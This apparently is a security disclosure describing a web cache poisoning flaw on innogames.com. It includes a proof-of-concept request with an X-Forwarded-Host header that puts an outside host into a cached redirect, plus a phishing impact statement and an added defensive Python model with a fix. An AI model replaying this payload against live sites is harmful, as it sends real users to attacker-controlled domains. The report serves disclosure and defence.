A cache poisoning vulnerability exists in requests to innogames.com. The issue arises when the language path parameter from the URL is processed on the backend and converted to lowercase. Then, if the path as provided does not exist on the server, a 301 redirect response is triggered. The URL taken from the X-Forwarded-Host header ends up in the cached redirect, so every user accessing this path is redirected to it.
https://innogames.com/DE/?variable=value
>Host: www.innogames.com
>Port: 443
>Check: Use HTTPS
Request:
GET /DE/?mace=triage HTTP/1.1
Host: www.innogames.com
Accept-Language: en,en-US;q=0.7,en;q=0.3
X-Forwarded-Host: not-evil.burpcollaborator.net
Response:
HTTP/1.1 301 Moved Permanently
Location: https://not-evil.burpcollaborator.net/de/?mace=triage
Content-Type: text/html; charset=UTF-8
X-Served-By: cache-fra19153-FRA, cache-ams21024-AMS
X-Cache: MISS, MISS
X-Cache-Hits: 0, 0
X-Timer: S1597672892.323454,VS0,VE16
Vary: Accept-Language,X-UA-Device
[...]
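As an added illustration that is not part of the original report: a small Python model of the redirect described above, beside a hardened variant that pins the Location host to a configured canonical host, plus a check that flags request headers which influenced a response without appearing in its Vary header (and so in the cache key). The function names and the canonical host constant are assumptions made for this example.

```python
# Added example (not from the original report). Models the backend redirect
# that lowercases the language path segment and shows why X-Forwarded-Host
# must not feed the Location header of a cacheable response.

CANONICAL_HOST = "www.innogames.com"  # assumption: the site's single public host


def _url(host, path, query):
    """Assemble https://host/path[?query], lowercasing the path as the backend does."""
    return f"https://{host}{path.lower()}" + (f"?{query}" if query else "")


def build_redirect(path, query, headers):
    """Vulnerable variant: the Location host is taken from X-Forwarded-Host.
    That header is not part of the cache key, so one poisoned request leaves a
    redirect that the cache serves to every later visitor of the path."""
    host = headers.get("X-Forwarded-Host", headers["Host"])
    return _url(host, path, query)


def build_redirect_safe(path, query, headers):
    """Hardened variant: the Location host comes from server configuration.
    Request-supplied proxy hints never reach a cacheable response."""
    return _url(CANONICAL_HOST, path, query)


def unkeyed_inputs(response_vary, influencing_headers):
    """Return the request headers that changed the response but are absent
    from Vary (hence from the cache key); each one is a poisoning vector."""
    keyed = {h.strip().lower() for h in response_vary.split(",") if h.strip()}
    return sorted(h for h in influencing_headers if h.lower() not in keyed)


if __name__ == "__main__":
    # Constructed request mirroring the report's proof of concept.
    req = {"Host": "www.innogames.com",
           "X-Forwarded-Host": "not-evil.burpcollaborator.net"}
    print(build_redirect("/DE/", "mace=triage", req))       # attacker-chosen host
    print(build_redirect_safe("/DE/", "mace=triage", req))  # canonical host only
    # Vary from the observed response vs. the headers the backend consulted.
    print(unkeyed_inputs("Accept-Language,X-UA-Device",
                         ["Accept-Language", "X-Forwarded-Host"]))
```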
# Impact statement
This could be used for phishing attacks. An attacker can set up a domain that looks similar to innogames.com and spread the poisoned link via Facebook or other forums, fooling users into following it and being redirected to the attacker's domain. However, one requirement for exploitability is that the attacker has to be located near the target user (from a network point of view); otherwise the poisoned request will not hit the same Fastly server as the user's request.
# References
Security advisories from Fastly